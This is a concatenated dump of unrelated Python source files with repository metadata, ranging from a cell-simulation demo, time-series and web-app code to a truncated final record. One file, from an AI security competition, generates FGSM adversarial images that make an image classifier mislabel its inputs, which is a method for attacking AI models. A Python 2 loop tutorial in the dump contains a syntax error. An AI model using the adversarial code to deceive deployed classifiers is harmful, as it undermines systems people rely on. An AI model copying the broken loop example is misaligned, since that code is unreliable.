dcc3c59f832a438160969f7eff0db6008ce5f49a | 632dcb4e37cadd87cb7ff8715b0048df5cd0d11b | /CompuCell3D/core/Demos/CC3DPy/scripts/AdhesionDemo.py | a0e3522ec008b21130e6d566bf455e82f0417b33 | [
"MIT"
] | permissive | CompuCell3D/CompuCell3D | df638e3bdc96f84b273978fb479842d071de4a83 | 65a65eaa693a6d2b3aab303f9b41e71819f4eed4 | refs/heads/master | 2023-08-26T05:22:52.183485 | 2023-08-19T17:13:19 | 2023-08-19T17:13:19 | 12,253,945 | 51 | 41 | null | 2023-08-27T16:36:14 | 2013-08-20T20:53:07 | C++ | UTF-8 | Python | false | false | 3,763 | py | """
This example demonstrates how to specify cell adhesion on the basis of molecular species.
"""
__author__ = "T.J. Sego, Ph.D."
__email__ = "tjsego@iu.edu"
from cc3d.core.PyCoreSpecs import Metadata, PottsCore
from cc3d.core.PyCoreSpecs import CellTypePlugin, VolumePlugin, ContactPlugin
from cc3d.core.PyCoreSpecs import UniformInitializer
from cc3d.core.PyCoreSpecs import AdhesionFlexPlugin
from cc3d.CompuCellSetup.CC3DCaller import CC3DSimService
def main():
###############
# Basic setup #
###############
# An interactive CC3D simulation can be initialized from a list of core specs.
# Start a list of core specs that define the simulation by specifying a two-dimensional simulation
# with a 100x100 lattice and second-order Potts neighborhood, and metadata to use multithreading
dim_x = dim_y = 100
specs = [
Metadata(num_processors=4),
PottsCore(dim_x=dim_x,
dim_y=dim_y,
neighbor_order=2,
boundary_x="Periodic",
boundary_y="Periodic")
]
##############
# Cell Types #
##############
# Define three cell types called "T1" through "T3".
cell_types = ["T1", "T2", "T3"]
specs.append(CellTypePlugin(*cell_types))
#####################
# Volume Constraint #
#####################
# Assign a volume constraint to all cell types.
volume_specs = VolumePlugin()
for ct in cell_types:
volume_specs.param_new(ct, target_volume=25, lambda_volume=2)
specs.append(volume_specs)
############
# Adhesion #
############
# Assign uniform adhesion to all cells, and additional adhesion by molecular species
contact_specs = ContactPlugin(neighbor_order=2)
for idx1 in range(len(cell_types)):
contact_specs.param_new(type_1="Medium", type_2=cell_types[idx1], energy=16)
for idx2 in range(idx1, len(cell_types)):
contact_specs.param_new(type_1=cell_types[idx1], type_2=cell_types[idx2], energy=16)
specs.append(contact_specs)
adhesion_specs = AdhesionFlexPlugin(neighbor_order=2)
adhesion_specs.density_new(molecule="M1", cell_type="T1", density=1.0)
adhesion_specs.density_new(molecule="M2", cell_type="T2", density=1.0)
formula = adhesion_specs.formula_new()
formula.param_set("M1", "M1", -10.0)
formula.param_set("M1", "M2", 0.0)
formula.param_set("M2", "M2", 10.0)
specs.append(adhesion_specs)
####################################
# Cell Distribution Initialization #
####################################
# Initialize cells over the entire domain.
unif_init_specs = UniformInitializer()
unif_init_specs.region_new(width=5, pt_min=(0, 0, 0), pt_max=(dim_x, dim_y, 1),
cell_types=["T1", "T1", "T2", "T2", "T3"])
specs.append(unif_init_specs)
#####################
# Simulation Launch #
#####################
# Initialize a CC3D simulation service instance and register all simulation specification.
cc3d_sim = CC3DSimService()
cc3d_sim.register_specs(specs)
cc3d_sim.run()
cc3d_sim.init()
cc3d_sim.start()
#################
# Visualization #
#################
# Show a single frame to visualize simulation data as it is generated.
cc3d_sim.visualize()
#############
# Execution #
#############
# Wait for the user to trigger execution
input('Press any key to continue...')
# Execute 10k steps
while cc3d_sim.current_step < 10000:
cc3d_sim.step()
# Report performance
print(cc3d_sim.profiler_report)
# Wait for the user to trigger termination
input('Press any key to close...')
if __name__ == '__main__':
main()
| [
"tjsego@gmail.com"
] | tjsego@gmail.com |
783ec51dceb9fa9c98c3845feb2efa5b9fc3a98a | fb3caa66ac0b2254b422303d670a70e597067758 | /201911_AI_Sec_Baidu/core-attack-codes/b_04.py | 03f7281f7068cfaf99a57ec7f5d848afd55c0a40 | [] | no_license | dyngq/Competitions | 065ec9f153919950b161aaa9fff6a9de9e29ba32 | e9b7ff8fbe038e148bc61b21b077f35cdc5368a9 | refs/heads/master | 2021-06-13T13:55:11.352531 | 2021-05-08T09:49:24 | 2021-05-08T09:49:24 | 186,392,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,927 | py | #coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import functools
import numpy as np
import paddle.fluid as fluid
#加载自定义文件
import models
from attack.attack_pp import FGSM, PGD
from utils import init_prog, save_adv_image, process_img, tensor2img, calc_mse, add_arguments, print_arguments
#######parse parameters
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
add_arg('class_dim', int, 121, "Class number.")
add_arg('shape', str, "3,224,224", "output image shape")
add_arg('input', str, "./input2_image/", "Input directory with images")
add_arg('output', str, "./input3_image/", "Output directory with images")
args = parser.parse_args()
print_arguments(args)
######Init args
image_shape = [int(m) for m in args.shape.split(",")]
class_dim=args.class_dim
input_dir = args.input
output_dir = args.output
model_name="MobileNetV2_x2_0"
pretrained_model="./models_parameters/MobileNetV2_x2_0"
val_list = 'val_list.txt'
use_gpu=True
######Attack graph
adv_program=fluid.Program()
#完成初始化
with fluid.program_guard(adv_program):
input_layer = fluid.layers.data(name='image', shape=image_shape, dtype='float32')
#设置为可以计算梯度
input_layer.stop_gradient=False
# model definition
model = models.__dict__[model_name]()
out_logits = model.net(input=input_layer, class_dim=class_dim)
out = fluid.layers.softmax(out_logits)
place = fluid.CUDAPlace(0) if use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
#记载模型参数
fluid.io.load_persistables(exe, pretrained_model)
#设置adv_program的BN层状态
init_prog(adv_program)
#创建测试用评估模式
eval_program = adv_program.clone(for_test=True)
#定义梯度
with fluid.program_guard(adv_program):
label = fluid.layers.data(name="label", shape=[1] ,dtype='int64')
loss = fluid.layers.cross_entropy(input=out, label=label)
gradients = fluid.backward.gradients(targets=loss, inputs=[input_layer])[0]
######Inference
def inference(img):
fetch_list = [out.name]
result = exe.run(eval_program,
fetch_list=fetch_list,
feed={ 'image':img })
result = result[0][0]
pred_label = np.argmax(result)
pred_score = result[pred_label].copy()
return pred_label, pred_score
######FGSM attack
#untarget attack
def attack_nontarget_by_FGSM(img, src_label):
pred_label = src_label
step = 8.0/64.0
eps = 32.0/64.0
while pred_label == src_label:
#生成对抗样本
adv=FGSM(adv_program=adv_program,eval_program=eval_program,gradients=gradients,o=img,
input_layer=input_layer,output_layer=out,step_size=step,epsilon=eps,
isTarget=False,target_label=0,use_gpu=use_gpu)
pred_label, pred_score = inference(adv)
step *= 2
if step > eps:
break
print("Test-score: {0}, class {1}".format(pred_score, pred_label))
adv_img=tensor2img(adv)
return adv_img
def attack_nontarget_by_FGSM_test(img, src_label):
pred_label = src_label
print("---------------AAAA-------------------Test-score: {0}, class {1}".format(pred_label, pred_label))
pred_label, pred_score = inference(img)
print("---------------BBBB-------------------Test-score: {0}, class {1}".format(pred_score, pred_label))
####### Main #######
def get_original_file(filepath):
with open(filepath, 'r') as cfile:
full_lines = [line.strip() for line in cfile]
cfile.close()
original_files = []
for line in full_lines:
label, file_name = line.split()
original_files.append([file_name, int(label)])
return original_files
def gen_adv():
mse = 0
original_files = get_original_file(input_dir + val_list)
for filename, label in original_files:
img_path = input_dir + filename
print("Image: {0} ".format(img_path))
img=process_img(img_path)
# attack_nontarget_by_FGSM_test(img, label)
prelabel, xxxx = inference(img)
if label == prelabel:
adv_img = attack_nontarget_by_FGSM(img, label)
else:
adv_img = tensor2img(img)
image_name, image_ext = filename.split('.')
##Save adversarial image(.png)
save_adv_image(adv_img, output_dir+image_name+'.jpg')
# attack_nontarget_by_FGSM_test(img, label)
org_img = tensor2img(img)
score = calc_mse(org_img, adv_img)
print(score)
mse += score
print("ADV {} files, AVG MSE: {} ".format(len(original_files), mse/len(original_files)))
def main():
gen_adv()
if __name__ == '__main__':
main()
| [
"dyngqk@163.com"
] | dyngqk@163.com |
c4554c601893281110fded6f14187ef73c6df8da | 5086e9d2ae0c146f80f546e97788a2e4b1e5438f | /stumpy/aampdist_snippets.py | cbf29b4fd5eb31168e0994c1091e9d1e56555ee2 | [
"BSD-3-Clause"
] | permissive | HuoHuoisAlan/stumpy | a6c9952c2dd3343710521858295145b7eca8f727 | 01e867cfbef6f827b5b28913fd76a4eda59c5fed | refs/heads/main | 2023-04-18T17:42:47.952135 | 2021-05-09T23:47:01 | 2021-05-09T23:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,043 | py | # STUMPY
# Copyright 2019 TD Ameritrade. Released under the terms of the 3-Clause BSD license.
# STUMPY is a trademark of TD Ameritrade IP Company, Inc. All rights reserved.
import math
import numpy as np
from .core import check_window_size
from .aampdist import _aampdist_vect
def _get_all_aampdist_profiles(
T,
m,
percentage=1.0,
s=None,
mpdist_percentage=0.05,
mpdist_k=None,
mpdist_custom_func=None,
):
"""
For each non-overlapping subsequence, `S[i]`, in `T`, compute the matrix profile
distance measure vector between the `i`th non-overlapping subsequence and each
sliding window subsequence, `T[j : j + m]`, within `T` where `j < len(T) - m + 1`.
Parameters
----------
T : ndarray
The time series or sequence for which to find the snippets
m : int
The window size for each non-overlapping subsequence, `S[i]`.
percentage : float, default 1.0
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
`percentage == 1.0`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
is used to compute `mpdist_vect`.
s : int, default None
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
When `s == m`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
the `percentage` parameter is ignored.
mpdist_percentage : float, default 0.05
The percentage of distances that will be used to report `mpdist`. The value
is between 0.0 and 1.0.
mpdist_k : int
Specify the `k`th value in the concatenated matrix profiles to return. When
`mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
mpdist_custom_func : object, default None
A custom user defined function for selecting the desired value from the
sorted `P_ABBA` array. This function may need to leverage `functools.partial`
and should take `P_ABBA` as its only input parameter and return a single
`MPdist` value. The `percentage` and `k` parameters are ignored when
`mpdist_custom_func` is not None.
Returns
-------
D : ndarray
MPdist profiles
Notes
-----
`DOI: 10.1109/ICBK.2018.00058 \
<https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
See Table II
"""
if m > T.shape[0] // 2: # pragma: no cover
raise ValueError(
f"The window size {m} for each non-overlapping subsequence is too large "
f"for a time series with length {T.shape[0]}. "
f"Please try `m <= len(T) // 2`."
)
right_pad = 0
if T.shape[0] % m != 0:
right_pad = int(m * np.ceil(T.shape[0] / m) - T.shape[0])
pad_width = (0, right_pad)
T = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
n_padded = T.shape[0]
D = np.empty(((n_padded // m) - 1, n_padded - m + 1))
if s is not None:
s = min(int(s), m)
else:
percentage = min(percentage, 1.0)
percentage = max(percentage, 0.0)
s = min(math.ceil(percentage * m), m)
# Iterate over non-overlapping subsequences, see Definition 3
for i in range((n_padded // m) - 1):
start = i * m
stop = (i + 1) * m
S_i = T[start:stop]
D[i, :] = _aampdist_vect(
S_i,
T,
s,
percentage=mpdist_percentage,
k=mpdist_k,
custom_func=mpdist_custom_func,
)
stop_idx = n_padded - m + 1 - right_pad
D = D[:, :stop_idx]
return D
def aampdist_snippets(
    T,
    m,
    k,
    percentage=1.0,
    s=None,
    mpdist_percentage=0.05,
    mpdist_k=None,
):
    """
    Identify the top `k` snippets that best represent the time series, `T`

    Parameters
    ----------
    T : ndarray
        The time series or sequence for which to find the snippets
    m : int
        The snippet window size
    k : int
        The desired number of snippets
    percentage : float, default 1.0
        With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
        is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
        `percentage == 1.0`, then the full length of `S[i]` is used to compute the
        `mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
        is used to compute `mpdist_vect`.
    s : int, default None
        With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
        is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
        When `s == m`, then the full length of `S[i]` is used to compute the
        `mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
        each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
        the `percentage` parameter is ignored.
    mpdist_percentage : float, default 0.05
        The percentage of distances that will be used to report `mpdist`. The value
        is between 0.0 and 1.0.
    mpdist_k : int
        Specify the `k`th value in the concatenated matrix profiles to return. When
        `mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.

    Returns
    -------
    snippets : ndarray
        The top `k` snippets
    snippets_indices : ndarray
        The index locations for each of top `k` snippets
    snippets_profiles : ndarray
        The MPdist profiles for each of the top `k` snippets
    snippets_fractions : ndarray
        The fraction of data that each of the top `k` snippets represents
    snippets_areas : ndarray
        The area under the curve corresponding to each profile for each of the top `k`
        snippets

    Notes
    -----
    `DOI: 10.1109/ICBK.2018.00058 \
    <https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__

    See Table I
    """
    # A snippet window longer than half the series cannot produce at least two
    # non-overlapping subsequences to compare against each other.
    if m > T.shape[0] // 2:  # pragma: no cover
        raise ValueError(
            f"The snippet window size of {m} is too large for a time series with "
            f"length {T.shape[0]}. "
            f"Please try `m <= len(T) // 2`."
        )

    check_window_size(m, max_size=T.shape[0] // 2)

    # D[i, j]: distance profile of the i-th non-overlapping m-length candidate
    # subsequence against position j of T (computed by the helper; it applies
    # the same NaN padding that is reproduced below).
    D = _get_all_aampdist_profiles(
        T,
        m,
        percentage=percentage,
        s=s,
        mpdist_percentage=mpdist_percentage,
        mpdist_k=mpdist_k,
    )

    # Pad T with NaNs so its length is a whole multiple of m.
    pad_width = (0, int(m * np.ceil(T.shape[0] / m) - T.shape[0]))
    T_padded = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
    n_padded = T_padded.shape[0]

    snippets = np.empty((k, m))
    snippets_indices = np.empty(k, dtype=np.int64)
    snippets_profiles = np.empty((k, D.shape[-1]))
    snippets_fractions = np.empty(k)
    snippets_areas = np.empty(k)
    # Q is the element-wise minimum over the profiles of the snippets chosen so
    # far (the running "coverage" curve); it starts at +inf before any choice.
    Q = np.full(D.shape[-1], np.inf)
    # Start index of every non-overlapping candidate snippet within T.
    indices = np.arange(0, n_padded - m, m)

    # Greedy selection (Table I of the paper): at each step pick the candidate
    # whose profile most reduces the area under the coverage curve min(D, Q).
    for i in range(k):
        profile_areas = np.sum(np.minimum(D, Q), axis=1)
        idx = np.argmin(profile_areas)

        # NOTE(review): the snippet is sliced from the *unpadded* T; for the
        # last candidate this slice may be shorter than m when
        # len(T) % m != 0 -- confirm this is the intended behavior.
        snippets[i] = T[indices[idx] : indices[idx] + m]
        snippets_indices[i] = indices[idx]
        snippets_profiles[i] = D[idx]
        snippets_areas[i] = np.sum(np.minimum(D[idx], Q))

        Q[:] = np.minimum(D[idx], Q)

    # Fraction of positions at which each chosen snippet attains the overall
    # minimum profile value, i.e. the share of T that snippet "represents".
    total_min = np.min(snippets_profiles, axis=0)

    for i in range(k):
        mask = snippets_profiles[i] <= total_min
        snippets_fractions[i] = np.sum(mask) / total_min.shape[0]
        # Lower total_min at claimed positions so later snippets cannot claim
        # the same positions again.
        total_min = total_min - mask.astype(np.float64)

    return (
        snippets,
        snippets_indices,
        snippets_profiles,
        snippets_fractions,
        snippets_areas,
    )
| [
"seanmylaw@gmail.com"
] | seanmylaw@gmail.com |
43bb8e261178ccdbc8e0f38e34e559c1b2793e98 | 7bfb0fff9d833e53573c90f6ec58c215b4982d14 | /1688_count_matches.py | 0df81efb7ce040266c81c8a31339b3ec5db755e9 | [
"MIT"
] | permissive | claytonjwong/leetcode-py | 6619aa969649597a240e84bdb548718e754daa42 | 16bbf8ac0ba5c80fe3ef67ade0d61a12991270a7 | refs/heads/master | 2023-07-14T23:40:26.569825 | 2021-08-22T17:23:20 | 2021-08-22T17:23:20 | 279,882,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #
# 1688. Count of Matches in Tournament
#
# Q: https://leetcode.com/problems/count-of-matches-in-tournament/
# A: https://leetcode.com/problems/count-of-matches-in-tournament/discuss/970250/Kt-Js-Py3-Cpp-1-Liners
#
class Solution:
    """LeetCode 1688: count matches in a single-elimination tournament."""

    def numberOfMatches(self, N: int) -> int:
        """Return the total matches played until one team remains.

        Simulates the tournament round by round: each round N // 2 matches
        are played and N // 2 winners (plus the odd team that sat out, if
        any) advance.
        """
        played = 0
        while N > 1:
            played += N // 2            # pairs that play this round
            N = N // 2 + (N & 1)        # winners + the bye team, if N is odd
        return played
| [
"claytonjwong@gmail.com"
] | claytonjwong@gmail.com |
8149d78a21a4530ab537abc4fe3892b1c77bac7f | a47ac7c64cb6bb1f181eadff8e4b24735c19080a | /PythonStudy/7-模块/a/Titan.py | 957bf78140bb6a110f980f0763207417854d9978 | [
"MIT"
] | permissive | CoderTitan/PythonDemo | 6dcc88496b181df959a9d43b963fe43a6e4cb032 | feb5ef8be91451b4622764027ac684972c64f2e0 | refs/heads/master | 2020-03-09T09:15:28.299827 | 2018-08-21T03:43:25 | 2018-08-21T03:43:25 | 128,708,650 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 669 | py |
# A single .py file is one module.
'''
def sayGood():
    print('good')
def sayNice():
    print('nice')
def sayBad():
    print('bad')
age = 20
name = 'titan'
print('这是Titan模块')
'''
# Every module has a __name__ attribute; when its value equals '__main__' the
# module is being executed directly, otherwise it was imported by another file.
# If the current file is the program's entry point, __name__ is '__main__'.
if __name__ == '__main__':
    print('这是Titan模块--a')
else:
    # Imported as a module: expose the demo functions and module constants.
    def sayGood():
        print('good--a')

    def sayNice():
        print('nice--a')

    def sayBad():
        print('bad--a')

    age = 20
    name = 'titan--a'
| [
"quanjunt@163.com"
] | quanjunt@163.com |
fa060e2a53f5effc20a8ce419c69bbe06bf117b4 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_22416.py | 84c894c7c3f546ab1aaffeb33d766e1d830f19d6 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | # Iron Python Error: expected <type 'bytes'> or bytearray, got <type 'str'> for Serial comm
# str.encode() already returns a bytes object, so the extra bytes(...) wrapper
# only made a redundant copy; encoding once is enough to satisfy pyserial.
ser.write(message.encode('utf-8'))
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
8bd9e1c2de7c0fb1b38880603978273791276919 | 854ec5a700af132a3423be5a27a8857d2d8357a6 | /project/tests/test__config.py | c7f681e4c786c681690d511179d626d9967463b3 | [
"MIT"
] | permissive | mohammad-chavoshipor/flask-challenge | 8f53ce80b84e88c101eec4e7e216a9e7625eec62 | 6902a43d6c5f435edc668bc51fc08cd785ffb965 | refs/heads/master | 2021-06-12T15:04:27.211542 | 2017-03-10T19:02:58 | 2017-03-10T19:02:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,736 | py | # project/server/tests/integration/test_config.py
import unittest
from flask import current_app
from flask_testing import TestCase
from project.server import app
class TestDevelopmentConfig(TestCase):
    """Verify the settings exposed by DevelopmentConfig."""

    def create_app(self):
        """flask-testing hook: build the app under the development config."""
        app.config.from_object('project.server.config.DevelopmentConfig')
        return app

    def test_app_is_development(self):
        self.assertFalse(current_app.config['TESTING'])
        # assertIs / assertIn / assertNotIn yield clearer failure messages
        # than assertTrue/assertFalse wrapped around `is` / `in` expressions.
        self.assertIs(app.config['DEBUG'], True)
        self.assertIsNotNone(current_app)
        self.assertNotIn('data_test.json', app.config['DATA_FILE'])
        self.assertIn('data_dev.json', app.config['DATA_FILE'])
        self.assertNotIn('stats_test.json', app.config['STATS_FILE'])
        self.assertIn('stats_dev.json', app.config['STATS_FILE'])
class TestTestingConfig(TestCase):
    """Verify the settings exposed by TestingConfig."""

    def create_app(self):
        """flask-testing hook: build the app under the testing config."""
        app.config.from_object('project.server.config.TestingConfig')
        return app

    def test_app_is_testing(self):
        self.assertTrue(current_app.config['TESTING'])
        # assertIs / assertIn / assertNotIn yield clearer failure messages
        # than assertTrue/assertFalse wrapped around `is` / `in` expressions.
        self.assertIs(app.config['DEBUG'], True)
        self.assertIn('data_test.json', app.config['DATA_FILE'])
        self.assertNotIn('data_dev.json', app.config['DATA_FILE'])
        self.assertIn('stats_test.json', app.config['STATS_FILE'])
        self.assertNotIn('stats_dev.json', app.config['STATS_FILE'])
class TestProductionConfig(TestCase):
    """Verify the settings exposed by ProductionConfig."""

    def create_app(self):
        """flask-testing hook: build the app under the production config."""
        app.config.from_object('project.server.config.ProductionConfig')
        return app

    def test_app_is_production(self):
        self.assertFalse(current_app.config['TESTING'])
        # assertIs pins DEBUG to the literal False, with a clearer failure
        # message than assertTrue(... is False).
        self.assertIs(app.config['DEBUG'], False)
if __name__ == '__main__':
    # Allow running this test module directly: `python test__config.py`.
    unittest.main()
| [
"hermanmu@gmail.com"
] | hermanmu@gmail.com |
83bcec5f7f7b822b4d5ee74bb80925b5e1c023e9 | 689eff74c3687f8386cbbdf4ff1d0c6b01568ba6 | /app/base/views.py | 281a6fd672ab301a139d9efebe1d4050f82f5bff | [] | no_license | huyquyet/projectBRS | fc50aac595112823c44952e137f11d6a3f6765a3 | 5a2f994a98f97db4b1717bc6187910ce9ad889e6 | refs/heads/master | 2021-01-10T10:09:44.265887 | 2015-12-16T03:53:39 | 2015-12-16T03:53:39 | 44,585,735 | 0 | 0 | null | 2015-12-15T07:16:39 | 2015-10-20T06:08:22 | HTML | UTF-8 | Python | false | false | 815 | py | from django.db.models import Avg
from django.views.generic.base import ContextMixin
from app.book.models import Book
from app.category.models import Category
__author__ = 'FRAMGIA\nguyen.huy.quyet'
class BaseView(ContextMixin):
    """Context mixin that injects the site-wide sidebar data (top-rated
    books and the full category list) into every view's template context."""

    model = Book

    def get_context_data(self, **kwargs):
        """Extend the parent context with the shared sidebar entries."""
        context = super(BaseView, self).get_context_data(**kwargs)
        context['base_list_book'] = return_list_book()
        context['base_list_category'] = return_list_category()
        return context
def return_list_book():
    """Return the six best-rated books, each decorated with its average
    rating and review count for template rendering."""
    top_books = Book.objects.annotate(
        Avg('rating_book__rate')
    ).order_by('-rating_book__rate__avg')[:6]
    for top_book in top_books:
        top_book.rate = top_book.get_rating_book()
        top_book.count_review = top_book.review_book.all().count()
    return top_books
def return_list_category():
    """Return every category, used for the navigation/sidebar menu."""
    return Category.objects.all()
| [
"nguyenhuyquyet90@gmail.com"
] | nguyenhuyquyet90@gmail.com |
a58b5f4e97d7f6162d8a7c522dc379644b1730e2 | 13130259156f6f9d16670cea88aa2608dd477d16 | /goeievraag/category/categorize_question.py | a12d559ec35a110035014a626c69944b5e85b342 | [] | no_license | fkunneman/DiscoSumo | d459251d543be5f4df38292a96f52baf4b520a0b | ed8f214834cf0c2e04a3bc429253502f7e79fbf8 | refs/heads/master | 2022-12-14T13:34:41.496963 | 2019-07-31T15:57:02 | 2019-07-31T15:57:02 | 140,422,779 | 2 | 1 | null | 2022-12-08T04:57:55 | 2018-07-10T11:36:00 | Python | UTF-8 | Python | false | false | 1,203 | py |
from qcat import QCat
import sys

# Paths to the trained model artefacts are supplied on the command line:
#   categorize_question.py <model> <label_encoder> <category2id> <vocabulary>
model_file = sys.argv[1]
label_encoder_file = sys.argv[2]
category2id_file = sys.argv[3]
vocabulary_file = sys.argv[4]

# Question categorizer backed by the pre-trained artefacts above.
qc = QCat(model_file,label_encoder_file,category2id_file,vocabulary_file)

# Dutch sample questions (pre-tokenised) used as a manual smoke test.
test_questions = ["Kunnen we volgende week weer schaatsen op natuurijs",
                  "Wat is het lekkerste recept voor boerenkool",
                  "Hoeveel kleuren heeft de regenboog",
                  "Wat is de symbolische betekenis van de kip die de vrouw vasthoudt op het schilderij De Nachtwacht",
                  "waar kan ik in amsterdam het best een dwerg hamster aanschaffen",
                  "Waarom zie je nooit babyduifjes",
                  "Hoe krijg je een weggelopen konijn ( ontsnapt ) weer terug",
                  "Wat is het synoniem voor synoniem",
                  "wat s de reden dat vogels niet vastvriezen aan een ijsschots",
                  "Als een winkel 24 uur per dag en 365 dagen per jaar geopend is , waarom zit er dan een slot op de deur"]

print('Now categorizing questions')
# Presumably returns, per question, the top-5 (second argument) category
# ranking -- TODO confirm against QCat.main's signature.
results = qc.main(test_questions,5)
for i,result in enumerate(results):
    print('TOP 5 categories for question',test_questions[i],':',result)
| [
"thiago.castro.ferreira@gmail.com"
] | thiago.castro.ferreira@gmail.com |
a1b9bf680534dbbfbc310a822deb14f1bb4e2dad | 51205b1a93bce66f1f47bd9eb5410e6f9b4c4da1 | /py/loop.py | e301447f632f4950299dabe067ddf745977ba7b9 | [
"MIT"
] | permissive | prataprc/gist | 70c2534079efb97cafd7bf58f1df4bb4284d13d1 | 4814ee6600d9f33dd940e4b3b9a98a0764a03bb5 | refs/heads/master | 2021-04-12T05:38:48.153925 | 2020-12-07T15:06:24 | 2020-12-07T15:06:24 | 32,151,350 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | #! /usr/bin/python
# Some examples using the looping constructs in python
a = ['cat', 'dog', 'elephant']
x = 10
print type(x)
for x in a :
print x, type(x), len(x)
b = 'hello \n world'
for x in b :
print x, type(x), len(x)
# Dangerous iteration on a mutable sequence (list)
# for x in a :
# a.insert(1, x) # Dont do this !
# print a
# To acheive the above mentioned purpose do the following
for x in a[:] : # Now we taking a copy of the sequence
a.insert(0, x) # you can safely do this !
print a
# Using the range() function
for x in range(10,100,30) :
print x,
else
print "the loop normally exited"
| [
"prataprc@gmail.com"
] | prataprc@gmail.com |
c4e566e7859ca5d0c9129e87c6823acbc30ec828 | dd9e7df6b7dd915e749f537f490f62d38b7fa214 | /maintenance/management/commands/init_foreign_uiks.py | 4dc74e932e8ed0915027885c5da01ffad9782c2f | [] | no_license | mikpanko/elections_network | 383039b5310d006811f3638924bed41184bc2a64 | 6c14c79d9ec74c30d9998533ef73819f0e2e91bd | refs/heads/master | 2020-12-31T03:16:49.742384 | 2012-06-30T14:19:22 | 2012-06-30T14:19:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,174 | py | import os.path
from django.conf import settings
from django.core.management.base import BaseCommand
from scrapy.selector import HtmlXPathSelector
from grakon.utils import print_progress, read_url
# Central election-commission page listing all foreign ("abroad") UIKs
# (polling stations) for Russian elections.
FOREIGN_UIKS_URL = 'http://www.foreign-countries.vybory.izbirkom.ru/region/region/foreign-countries?action=show&root=1000085&tvd=100100032124923&vrn=100100031793505&region=99&global=true&sub_region=99&prver=0&pronetvd=null&vibid=100100032124923&type=226'


class Command(BaseCommand):
    """Management command that creates Location records for foreign UIKs by
    joining a local CSV with data scraped from the izbirkom web site."""
    help = "Init foreign uiks"

    def handle(self, *args, **options):
        # Imported lazily so the module can load without Django app registry.
        from locations.models import FOREIGN_CODE, FOREIGN_NAME, Location

        # CSV columns: uik number, country location id, country name, address.
        uiks = {}
        for line in open(os.path.join(settings.PROJECT_PATH, 'data', 'foreign_uiks.csv'), 'r'):
            uik_no, country_id, country_name, address = line.strip().split(',')
            uiks[uik_no] = {'tik': int(country_id), 'address': address}

        # Country location id -> Location (foreign-region locations with no tik).
        countries_by_id = dict((location.id, location) for location in Location.objects.exclude(region=None) \
                                   .filter(tik=None).filter(region_code=FOREIGN_CODE))
        foreign_countries = Location.objects.get(region=None, region_code=FOREIGN_CODE)

        i = 0
        # Scrape the <select name='gs'> drop-down: one <option> per UIK; the
        # option text starts with the 4-digit UIK number and the option value
        # is a URL whose query string carries the 'root' and 'tvd' ids.
        for uik_option in HtmlXPathSelector(text=read_url(FOREIGN_UIKS_URL)) \
                .select("//select[@name='gs']//option"):
            uik_no = uik_option.select("text()").extract()[0].strip()[:4]
            if uik_no not in uiks:
                # UIK present on the site but missing from the CSV: report it.
                print uik_no
                continue

            url = uik_option.select("@value").extract()[0]
            for param in url.split('?')[1].split('&'):
                param_name, param_value = param.split('=')
                if param_name in ('root', 'tvd'):
                    uiks[uik_no][param_name] = int(param_value)

            location = Location(region=foreign_countries, tik=countries_by_id[uiks[uik_no]['tik']],
                                name=uik_no, region_name=FOREIGN_NAME, region_code=FOREIGN_CODE,
                                address=uiks[uik_no]['address'], tvd=uiks[uik_no]['tvd'],
                                root=uiks[uik_no]['root'], data='{}')
            location.save()

            i += 1
            # 350 is presumably the expected number of foreign UIKs (progress
            # bar total) -- TODO confirm.
            print_progress(i, 350)
| [
"sergkop@gmail.com"
] | sergkop@gmail.com |
6d9273b5b0345cc09ca089ba02ca5e9fd109dddc | 2d4380518d9c591b6b6c09ea51e28a34381fc80c | /CIM16/IEC61968/Metering/ComFunction.py | 5e3b93609661efbb5adef5b2bc8c60c312ecd3ea | [
"MIT"
